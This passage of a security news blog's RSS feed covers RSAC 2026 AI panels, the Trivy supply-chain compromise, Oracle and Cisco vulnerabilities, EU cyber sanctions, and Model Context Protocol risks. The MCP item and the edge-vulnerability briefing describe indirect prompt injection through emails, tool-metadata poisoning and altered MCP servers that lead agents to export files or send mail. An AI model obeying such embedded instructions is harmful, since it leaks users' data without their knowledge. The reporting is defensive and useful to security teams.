Further down the intrusion sequence, defenders can restrict script and loader execution by disabling or tightly controlling unauthorized Python execution on endpoints. Teams can utilize application allowlisting to approve only specific scripts or binaries and monitor for the suspicious use of legitimate tools. Finally, to detect the campaign's in-memory execution and fileless activity, organizations should deploy EDR and XDR solutions configured with memory scanning and behavioral detection capabilities.

*(Originally reported by Elizabeth Montalbano)*
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>CISOs Evaluate the Human Role in AI-Powered Security at RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/afcb3a85-b614-4245-83f7-0cc6689bb73a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/afcb3a85-b614-4245-83f7-0cc6689bb73a</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:46 GMT</pubDate>
        <description>Security leaders from Google Cloud, Vodafone, and PayPal outline methodologies for integrating AI safely, evaluating the balance between automated defenses, scalable guardrails, and necessary human oversight.</description>
        <content:encoded><![CDATA[
            At the RSAC 2026 Conference in San Francisco, a central question emerged regarding enterprise artificial intelligence deployments: do these systems require a "human in the loop," or does manual oversight limit operational speed and scalability?

During a panel titled "including Threat and Strategy: The CISO's Playbook for the AI Revolution," security executives examined evolving AI use cases and the requirements for safe, protective deployment. Moderated by James Rundle of The Wall Street Journal, the discussion featured Francis deSouza, Google Cloud chief operating officer and president of security products; Emma Smith, Vodafone global CISO; and Shaun Khalfan, PayPal senior VP and CISO.

The integration of LLM-powered security tools has shifted the broader security environment. Securing AI systems requires strict standards to prevent the exposure of sensitive corporate data through vulnerabilities such as prompt injections. The shared data security model between AI vendors and customers remains operationally complex. Additionally, engineering practices like relying heavily on AI-generated code without adequate human review can introduce new structural risks, adding complexity to the CISO's mandate. Industry studies indicate that many organizations are still working to mature their AI security and governance deployments.

The panelists shared their current operational baselines. Google reports that 50% of its code is currently AI-generated with developer assistance. Vodafone security analysts use AI systems to automate workflows and generate executive summaries of technical data. Khalfan noted that PayPal utilizes AI to support fraud detection across its one billion monthly transactions.

Smith detailed Vodafone's realization that adopting AI safely requires a top-down approach from leadership to ensure ethical and responsible integration. Vodafone's architectural solution is AI Booster, a centralized machine learning platform built on Google's Vertex AI. It features a central, reusable codebase that allows the organization to deploy established use cases quickly via pre-trained models and custom tools. This centralization gives Vodafone's privacy engineering team a consistent framework to review each use case, track business value, and verify that proper guardrails are in place.

## Evaluating the human operational role

The panel evaluated the "human in the loop" model—the practice of requiring human validation for LLM outputs at specific steps. deSouza noted that manual defense processes are often too slow to mitigate automated, agent-driven security threats. Because of this velocity mismatch, Google is moving toward agent-assisted defense architectures.

Smith agreed that relying strictly on human review is difficult to sustain for scaled operations.

"I totally agree that a human in the loop is not scalable if we think about our traditional security controls," Smith said. "Let's face it, we rely on the ones that are technical and automated and that we can prove over time. A human in the loop is not the solution for the long term, certainly on scaled operations."

Instead, organizations can position personnel "on the loop" to review insights and guide AI systems asynchronously. Smith noted that Vodafone utilizes a heat map to evaluate the confidence and potential risk impact of AI outcomes. For use cases with a high risk impact, the organization strictly enforces a human-in-the-loop requirement unless an overriding business benefit justifies an alternative, highly monitored approach.

## Structuring data security and industry collaboration

Khalfan emphasized the necessity of encasing AI initiatives within a comprehensive compliance and risk framework. While PayPal utilizes the engineering benefits of AI tooling, he stated that the surrounding data security wrapper is equally critical.

"When we think about our key AI principles, it's data and security. It's privacy, it's transparency, it's explainability," Khalfan said. "As we wrap everything we're doing in these principles, it helps us keep this anchor of all of the efforts that we're making."

To operationalize this, PayPal's AI teams categorize models in tiers based on data sensitivity. This classification determines the specific controls required to protect stored data from tampering and unauthorized inputs, including prompt injections. It also guides how the organization manages the multiple identities required by AI agents.

Khalfan also pointed to the value of broader ecosystem collaboration, specifically referencing the Coalition for Secure AI (CoSAI). This industry-wide initiative provides documentation, white papers, and standardized methodologies to support secure AI development across different workstreams.

Alexandra Rose, director of government partnerships and the Counter Threat Unit at Sophos, summarized the objective of safe AI deployment as a balance of innovation and protection.

"I think it's important that security is not the world of no," she said. "It's how do we get to yes, and how do we get to a yes in a way that we're protected?"
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Security incident involving open-source Trivy components and CI/CD environments</title>
        <link>https://security.shortwaves.live/blog/5d730f47-8420-4268-a90e-1b093933bf5d</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/5d730f47-8420-4268-a90e-1b093933bf5d</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:45 GMT</pubDate>
        <description>An unauthorized party compromised specific open-source components of the Trivy security scanner, modifying existing GitHub Action tags to collect sensitive CI/CD secrets. Organizations using affected Trivy components during the exposure window should immediately audit their pipelines and rotate accessible credentials.</description>
        <content:encoded><![CDATA[
            A recent software supply chain security incident involving the open-source Trivy security scanner resulted in unauthorized modifications designed to collect sensitive secrets from automated enterprise software build and deployment pipelines. The unauthorized party targeted cloud credentials, SSH keys, authentication tokens, and other sensitive data.

Trivy is an open-source scanner widely used to identify vulnerabilities in container images, code repositories, and infrastructure configurations. Because many organizations integrate Trivy deeply into their continuous integration and continuous delivery (CI/CD) pipelines, the tool operates with elevated privileges. Aqua Security, the primary maintainer of Trivy, offers a separate commercial version of the scanner, which the company states does not appear to have been impacted by this incident.

## Multistage software supply chain incident

The security incident began in February when a misconfiguration in Trivy’s GitHub Action component allowed an unauthorized party to obtain a privileged access token. This token provided access to Trivy's repository automation and release environment.

The Trivy team discovered the initial unauthorized access and disclosed it on March 1. The team executed a credential rotation; however, the threat actor managed to retain access to the environment and capture newly rotated secrets.

On March 19, the threat actor used those credentials to force-push unauthorized code to 76 of the 77 previously released versions of `trivy-action`, the GitHub Action that organizations use to run Trivy scans inside their automated CI/CD pipelines. A CI/CD pipeline referencing any of those mutable version tags would have downloaded and executed the compromised code instead of the legitimate original.

The unauthorized party also altered all seven versions in the `setup-trivy` repository. Additionally, the threat actor used a compromised automated service account, `aqua-bot`, to publish a compromised version of Trivy, v0.69.4, and manipulate its GitHub Action tags.

In a March 22 security update, Aqua Security noted that the threat actor modified existing version tags associated with `trivy-action` to introduce unauthorized code into workflows that organizations were already running. Because many automated CI/CD pipelines rely entirely on version labels without verifying code integrity through commit hashes, the pipelines continued running without detecting the modifications.

In a subsequent update on March 23, Aqua disclosed that the threat actor used the compromised automated service account to publish two compromised Docker images, v0.69.5 and v0.69.6, distributing the unauthorized code through Trivy's trusted release channels.

## Credential harvesting mechanism

The Trivy security team and Aqua Security analyzed the unauthorized code, describing it as a credential-harvesting mechanism. It scans over 50 filesystem locations for SSH keys; cloud provider credentials for AWS, Google Cloud, and Azure; Kubernetes authentication tokens; Docker configuration files; environment variable files; database credentials; and cryptocurrency wallets.

The analysis shows the script uses AES-256-CBC with RSA-4096 hybrid encryption to secure and transmit collected data to external infrastructure controlled by the threat actor. If external transmission fails, the code initiates a fallback mechanism: it creates a public GitHub repository named `tpcp-docs` on the affected organization's account and uploads the collected data there.

According to Aqua Security, this combination of credential compromise, abuse of trusted release channels, and silent execution within CI/CD pipelines illustrates the mechanics of a modern software supply chain incident.

This incident reflects a broader pattern of threat actors focusing on trusted security tools and vendors. Earlier this month, Outpost24 reported an incident involving a sophisticated seven-stage phishing chain aimed at obtaining credentials from a C-level executive. While that specific attempt was unsuccessful, these events demonstrate ongoing efforts to compromise security products that organizations rely on and grant extensive environmental access.

## Recommended remediation steps

Organizations that used any affected version of Trivy, `trivy-action`, or `setup-trivy` during the exposure windows must treat all secrets accessible to those pipelines as compromised and rotate them immediately. Based on guidance from Aqua Security and the Trivy maintainers, we recommend the following actions:

* Audit Trivy versions: Review systems to determine if they pulled or executed the compromised Trivy v0.69.4, v0.69.5, or v0.69.6 versions from any source, and remove them immediately.

* Update to known-safe versions: Ensure all workflows are running verified safe versions, such as Trivy binary v0.69.2 or v0.69.3, `trivy-action` v0.35.0, and `setup-trivy` v0.2.6.

* Review GitHub Action references: Check all workflows using `aquasecurity/trivy-action` or `aquasecurity/setup-trivy` for signs of compromise, specifically reviewing run logs from March 19 and 20.

* Search for exfiltration artifacts: Inspect GitHub organizations for the presence of a repository named `tpcp-docs`, which indicates the fallback exfiltration mechanism was triggered.

* Pin GitHub Actions to full SHA hashes: To prevent exposure to mutable tag modifications in the future, organizations should configure CI/CD pipelines to pin GitHub Actions to full, immutable commit SHA hashes rather than version tags.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Evaluating AI in the SOC: Operational Metrics and Governance from RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/5c644040-88ec-495d-8815-fd5ca066803f</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/5c644040-88ec-495d-8815-fd5ca066803f</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:45 GMT</pubDate>
        <description>Enterprise security leaders from the financial and manufacturing sectors shared results from a six-month trial integrating AI into their Security Operations Centers. The findings demonstrate that while large language models effectively reduce analyst fatigue and time-to-discovery, safe deployment requires strict read-only architectures and human-in-the-loop governance.</description>
        <content:encoded><![CDATA[
            At the RSAC 2026 Conference in San Francisco, enterprise security leaders addressed the operational pressure to integrate artificial intelligence into security operations centers (SOCs). To determine where AI provides measurable value and where it introduces unmanaged risk, Shilpi Mittal, overseeing a Fortune 500 food manufacturing company, and Ankit Gupta, protecting a financial institution, conducted structured six-month trials. They shared their findings during the session, "We Put AI in Our SOC — Here’s What Worked and What Didn't."

Both environments require rigorous safeguarding against security incidents, though their specific operational constraints differ. To test the technology responsibly, Mittal and Gupta established defined pilot programs to measure performance, fatigue reduction, and system reliability.

## Deploying AI in a manufacturing environment

Mittal’s team deployed a large language model (LLM) as a read-only triage assistant within their case workflow. The tool evaluated telemetry from endpoint detection and response (EDR), cloud systems, applications, and operational technology (OT) monitoring feeds.

The pilot yielded quantifiable improvements in standard operational metrics. Based on initial processing, mean time to discovery (MTD) improved by 26% to 36%, mean time to response (MTTR) improved by 22%, and false positives dropped by 16 points.

Because operational downtime in manufacturing directly impacts production lines and worker safety, the team established strict system boundaries. AI was prohibited from directly interacting with programmable logic controllers (PLCs), SCADA systems, or any production equipment. The security team also enforced human approval gates, strict tool allow lists, mandatory citations for AI outputs, and comprehensive audit logging.

In one approved automated response scenario, the system identified a suspicious `.git` file on an endpoint. The AI categorized the file as unauthorized code, quarantined it, and suspended the associated software to prevent execution. While this demonstrated capable proactive prevention, Mittal noted the AI also generated new types of false positive alerts for the team to process. Scaling these tools across sprawling OT and legacy environments will require continuous tuning.

## Testing autonomous control in a financial SOC

Gupta’s financial organization operates under strict state-level regulatory oversight, including privacy mandates from California and Texas, meaning any automated action carries significant compliance weight. His team found AI highly effective for structured tasks like fraud detection, algorithmic trading, automated underwriting, and updating deterministic playbooks.

However, when applied directly to SOC workflows, fully autonomous AI proved unreliable. During a two-week test in a non-production environment where the AI was granted full control over alert management, the model struggled to process the reality of SOC data. Encountering incomplete fields, inconsistent identifiers, and ambiguous signals, the system incorrectly removed authorized users from the network.

Consequently, Gupta concluded that while AI excels at summarizing complex data, correlating context, and structuring narratives from multiple security tools, final decisions must remain with human analysts. By shifting documentation and context-gathering tasks to the LLM, the organization saved analysts 10 to 15 hours per week, measurably reducing fatigue and context switching.

## Governance and paths forward

The trials offer a practical framework for organizations facing executive pressure to adopt AI technologies. Integrating AI successfully requires a risk-based approach that prioritizes problem clarity, strict access management, and human-in-the-loop validation for high-impact decisions.

Security teams evaluating AI should establish the following controls:
* Data and access management: Build controls to minimize data exposure and create strict identity protocols for AI tools and APIs.

* Transparency: Require explainable outputs for any decisions that impact access or compliance.

* Continuous validation: Actively test systems for unauthorized inputs and treat AI models like any other critical security control by routinely auditing their results.

As organizations adapt to new capabilities, security teams must stay actively engaged in the deployment process to support innovation safely. Summing up the relationship between security initiatives and organizational goals, Mittal advised: "Business drives security. Security doesn't drive the business."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Securing the Execution Layer: Remediation Strategies for Emerging Edge and Identity Vulnerabilities</title>
        <link>https://security.shortwaves.live/blog/91fe8aef-f29a-4d3e-bf7b-386f27b9c26a</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/91fe8aef-f29a-4d3e-bf7b-386f27b9c26a</guid>
        <pubDate>Sat, 21 Mar 2026 03:17:49 GMT</pubDate>
        <description>Recent advisories for Oracle and Cisco infrastructure, alongside evolving ransomware methodologies, require immediate attention from enterprise security teams. This briefing outlines the technical mechanisms of these vulnerabilities and provides actionable mitigation strategies to protect identity management systems and edge devices.</description>
        <content:encoded><![CDATA[
            In the last 24 hours, the defensive environment has shifted significantly as critical vulnerabilities in enterprise edge and identity infrastructure take priority for security teams. Organizations are facing a dual challenge: addressing high-severity advisories from major vendors like Oracle and Cisco while simultaneously navigating a concurrent rise in ransomware activity that utilizes both zero-day vulnerabilities and common administrative tools. These developments show a persistent trend where sophisticated threat actors, including the Interlock and Beast ransomware groups, effectively navigate the gap between a vulnerability’s disclosure and its eventual remediation in complex enterprise networks.

For many organizations, the most urgent priority is Oracle’s rare out-of-band security alert for CVE-2026-21992. Carrying a nearly maximum CVSS score of 9.8, this vulnerability affects Oracle Fusion Middleware, specifically the Identity Manager (OIM) and Web Services Manager (OWSM). The flaw resides in the HTTP API surface and allows unauthenticated remote code execution (RCE). Oracle’s decision to release this update outside of its standard quarterly cycle is a significant indicator of risk; such alerts have occurred only about 30 times in the last 15 years. This vulnerability allows an unauthorized party to manipulate identities, roles, and policies, providing a direct path for lateral movement and privilege escalation within production environments.

This Oracle advisory mirrors a similar critical situation with Cisco’s Secure Firewall Management Center (FMC). Recent analysis from Amazon Web Services (AWS) reveals that the Interlock ransomware group began leveraging CVE-2026-20131 (CVSS 10.0) as early as January 26, well before Cisco’s public disclosure on March 4. This vulnerability involves insecure deserialization of Java byte streams, allowing unauthenticated parties to execute arbitrary code as root. The Interlock group combined this vulnerability with a sophisticated multi-stage sequence, using custom remote-access Trojans (RATs) and automated PowerShell scripts to map Windows environments. By the time many organizations received the notification to patch, threat actors had already established persistent command-and-control (C2) through redundant JavaScript and Java-based backdoors.

Beyond these high-profile incidents, the operational mechanics of ransomware groups are becoming clearer through recent server exposures. Security researchers recently analyzed a server belonging to the Beast ransomware group, an evolution of the Monster family. The findings detail a heavy reliance on "dual-use" software, legitimate applications like AnyDesk for remote management and Mega for data exfiltration. Beast’s methodology specifically targets structural recovery; the group utilizes scripts like `disable_backup.bat` to halt the Volume Shadow Copy Service (VSS) and delete snapshots before deploying their encryptor. While the broader ransomware field saw encryption rates drop to 50% in the last year, the sophistication of these groups in disrupting isolated backups and wiping system logs with utilities like `CleanExit.exe` remains a primary concern for incident responders.

Technically, these threats represent an intersection of identity manipulation and edge-device compromise. In the case of the Oracle vulnerability, the low complexity of the methodology means that an unauthorized party could degrade network defenses by modifying OWSM security policies without ever needing valid credentials. Meanwhile, the Interlock campaign demonstrates the danger of edge devices as pivot points. Because firewalls are inherently internet-facing and often lack deep internal telemetry, they provide an ideal staging ground for threat actors to move laterally. The Interlock group even deployed disposable relay networks built with BASH scripts to obscure their origins, complicating attribution and detection efforts.

This shift toward autonomous execution and unauthorized instruction is also beginning to manifest in the AI space. As organizations adopt the Model Context Protocol (MCP) to connect large language models (LLMs) to enterprise data, they are introducing architectural risks that traditional patching cannot fix. In an MCP-enabled environment, the LLM transitions including a text generator to an execution engine that can autonomously trigger workflows or access local files. This creates exposure and "indirect prompt injection," where hidden instructions in a retrieved email or document can direct the LLM to export sensitive data. Furthermore, "tool poisoning" allows unauthorized users to manipulate the metadata an LLM uses to understand its capabilities, effectively turning the AI agent against the host environment.

To protect production environments, the immediate priority is clear: verify and patch Cisco FMC and Oracle Fusion Middleware installations immediately. Given that Interlock was leveraging the Cisco flaw weeks before disclosure, security teams should also review logs for indicators of compromise (IoCs) provided by AWS and Cisco, specifically looking for unusual Java execution or root-level activity on firewall management interfaces. To counter the dual-use tool tactics seen in the Beast ransomware analysis, organizations should implement strict application allow-listing and EDR policies that block unauthorized remote management software by default.

Looking ahead, the European Council’s recent sanctions against technology firms in China and Iran serve as a reminder of the geopolitical weight behind these cyber operations. By sanctioning groups like iSoon and Integrity Technology Group—which was linked to unauthorized access across 65,000 devices in Europe. Regulatory bodies are attempting to squeeze the commercial infrastructure that supports state-sponsored intrusions. However, as these groups continue to operate through private-sector fronts and utilize zero-day vulnerabilities in critical infrastructure, the burden remains on enterprise security teams to maintain defense-in-depth strategies.

While the current patches address the most immediate RCE threats, the broader challenge of securing the "execution layer"—whether in firewalls, identity managers, or emerging AI protocols. Remains an ongoing focus. It is currently unknown if CVE-2026-21992 is being actively targeted in production environments like its Cisco counterpart, but the historical precedent for similar Oracle vulnerabilities suggests that unauthorized access attempts will likely materialize quickly.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>EU implements sanctions against technology firms in China and Iran for malicious cyber activities</title>
        <link>https://security.shortwaves.live/blog/7c3ed62b-ac78-413d-b70c-2ea191dd6290</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/7c3ed62b-ac78-413d-b70c-2ea191dd6290</guid>
        <pubDate>Sat, 21 Mar 2026 03:17:49 GMT</pubDate>
        <description>The European Council has applied restrictive measures to three organizations and two individuals for their roles in unauthorized access campaigns against European infrastructure. The action reflects a structured regulatory response to state-sponsored operations and supply chain risks.</description>
        <content:encoded><![CDATA[
            The European Council has imposed sanctions on three ostensibly private companies, two based in China and one in Iran—for facilitating and executing unauthorized access operations against organizations in European countries.

One of the organizations, Integrity Technology Group, is a mid-size publicly traded corporation in China. Investigations showed the company supplied tools that threat actors used to compromise systems globally. The European Council linked the firm's software to 65,000 compromised devices across six European Union (EU) countries between 2022 and 2023.

The Council also sanctioned Anxun Information Technology, widely known as iSoon. While presenting itself as a cybersecurity training company, iSoon operates as a contract-based intrusion group supporting China's government and military. The EU also sanctioned the company's two founders as individuals.

The Iranian company, Emennet Pasargad, faces sanctions for gaining unauthorized access to a Swedish SMS service, exposing data from a French organization, and distributing disinformation via advertising billboards during the 2024 Paris Olympic Games.

These three organizations were previously sanctioned by the US and UK governments. Under the new European restrictions, they are prohibited from conducting business within the EU, their regional assets are frozen, and the two sanctioned individuals face travel bans across EU member states.

## Why nations leverage private sector entities

State-level operations frequently rely on private sector companies for support. Adam Meyers, head of counter adversary operations at CrowdStrike, notes that this operational model is common across several nations. Corporations provide military units with necessary technical capabilities, infrastructure development, and planning resources.

In China, the People's Liberation Army (PLA) has maintained close connections with the private sector and academia since the 1990s. Iran followed a different trajectory. Following the discovery of the Stuxnet malware, Iranian operators began shifting including informal networks and professional corporate structures. These newly formed companies provided training and met the demand for technical capabilities at the Ministry of Intelligence and Security (MOIS) and the Islamic Revolutionary Guard Corps (IRGC).

Running operations through quasi-private institutions provides nation-states with plausible deniability. Crystal Morin, senior cybersecurity strategist at Sysdig, explains that maintaining a legitimate commercial offering complicates law enforcement efforts to distinguish standard business practices including unauthorized behavior.

Corporate structures also provide access to resources that might be restricted for state entities. Operating as a company simplifies talent recruitment. It also allows groups and purchase infrastructure and tools through the global supply chain using legitimate tax IDs and credentials. Furthermore, privatized workforces generally operate with fewer bureaucratic constraints than direct government agencies.

## Evaluating the impact of sanctions

The recent sanctions stem from regulatory frameworks developed over several years. Following a series of severe global security incidents in the mid-2010s, including the WannaCry and NotPetya malware events—the European Council established a "Cyber Diplomacy Toolbox" in June 2017. This framework outlined diplomatic and regulatory responses to infrastructure threats. The council formalized the specific mechanics of these sanctions in May 2019 and has since applied them to seven entities and 19 individuals.

For publicly traded organizations like Integrity Technology Group, sanctions carry tangible business consequences. Legitimate partners and customers typically sever ties to avoid regulatory penalties, which restricts the organization's access to funding, infrastructure, and global supply chains. While these measures do not completely neutralize a threat group's operations, they force operators out of standard commercial environments and affect their reputation.

For organizations functioning primarily as front companies, such as iSoon, the direct commercial impact is less severe. However, the restrictions still impose personal consequences on leadership, limiting their international mobility and freezing any assets held in cooperating jurisdictions.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Addressing architectural security risks in Model Context Protocol integrations</title>
        <link>https://security.shortwaves.live/blog/2e17a619-a8d5-45fa-8b9b-68eba0d37441</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/2e17a619-a8d5-45fa-8b9b-68eba0d37441</guid>
        <pubDate>Sat, 21 Mar 2026 03:17:49 GMT</pubDate>
        <description>The integration of the Model Context Protocol (MCP) shifts large language models from text generators to autonomous execution engines, introducing distinct architectural risks. Organizations adopting MCP must implement structural defenses, such as behavioral baselines and strict access controls, to protect enterprise data from unauthorized instructions.</description>
        <content:encoded><![CDATA[
            Organizations rushing to connect large language models (LLMs) to external data sources and services using the Model Context Protocol (MCP) are inadvertently expanding their exposure areas in ways that traditional security controls are not designed to manage.

Because these risks stem from the foundational architecture of both LLMs and MCP, security teams cannot resolve them through standard patching or basic configuration changes. Gianpietro Cutolo, a cloud threat researcher at Netskope, is scheduled to detail these findings during a session at the RSAC 2026 Conference in San Francisco, emphasizing the need for structural safeguards.

## Core architectural challenges

The primary issue lies in how an LLM's operational behavior changes when integrated with MCP. In a standard deployment, an LLM receives a prompt and generates a text response for a user to review. Historically, the primary security risk in this dynamic was an inaccurate or hallucinated response.

MCP fundamentally alters this paradigm. Instead of merely generating text, the LLM executes actions on behalf of the user. In an MCP-enabled environment, an LLM can autonomously access enterprise data, trigger workflows, and interact with APIs.

For example, a user might ask an AI assistant, such as Claude or ChatGPT, to schedule a meeting. The model can use an MCP connector for Google Calendar to check availability, create the event, and set a reminder without manual intervention. The model itself selects which published functions to use—such as fetching emails, creating calendar events, or searching local files—and determines the exact parameters for those actions. While MCP connectors allow organizations to extend the utility of their AI services, this execution capability introduces new security requirements.

One foundational challenge is that LLMs process content and instructions through the same context window. When an MCP connector retrieves content from an external source, such as a document or email, the LLM evaluates the entire payload as input. This creates an opening for an unauthorized party to embed hidden instructions within otherwise legitimate content.

If a threat actor sends an email containing both standard text and hidden instructions, and the user asks their AI assistant to summarize that email, the MCP connector injects the entire message into the LLM's context. Unable to separate the data from the directive, the LLM may execute the hidden instruction. This could result in the model exporting local files or sending emails without the user's knowledge. The impact of this process, known as indirect prompt injection, scales significantly in environments where a single agent maintains active MCP connections to local drives, Jira tickets, and cloud storage. A single email containing unauthorized instructions could initiate coordinated actions across all connected services simultaneously.

A second risk category involves tool metadata manipulation, sometimes referred to as tool poisoning. When an LLM connects to an MCP server, it requests a list of supported tools, including their names and input requirements. This metadata feeds directly into the LLM context window. An unauthorized party can embed unsafe instructions within this tool metadata, which the LLM will again process as functional directives.

A third risk, categorized by Cutolo as a "Rug Pull," occurs when an MCP server undergoes an unauthorized modification. The current protocol lacks a native mechanism to notify an MCP client or AI agent when a server's underlying logic changes. If an established MCP server is altered via a modified update, it can begin serving unsafe tool descriptions that direct the AI agent to take unintended actions, with the client having no immediate visibility into the alteration.

## Developing an architectural defense

Because these behaviors are inherent to how LLMs and MCP operate, organizations must implement defense-in-depth strategies rather than relying on software patches.

To mitigate indirect prompt injection, organizations should physically or logically separate MCP servers that handle public data including those with access to private enterprise information. Security teams should implement scanning mechanisms and detect instruction-like patterns, hidden text, and unusual formatting within any context the agent might process. Additionally, maintaining strict human-in-the-loop requirements for all sensitive actions ensures that critical operations are explicitly authorized.

For broader environmental protection, organizations should maintain a comprehensive inventory of every MCP server and rigorously enforce least-privilege permissions, ensuring each connector can only access the specific resources required for its function. Logging all MCP traffic and establishing behavioral baselines will allow security teams to detect when an AI agent's activity deviates from expected patterns. Finally, to defend against metadata manipulation, security teams should systematically scan all tool metadata for unauthorized instructions before approving the installation of any MCP server.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
</channel>
</rss>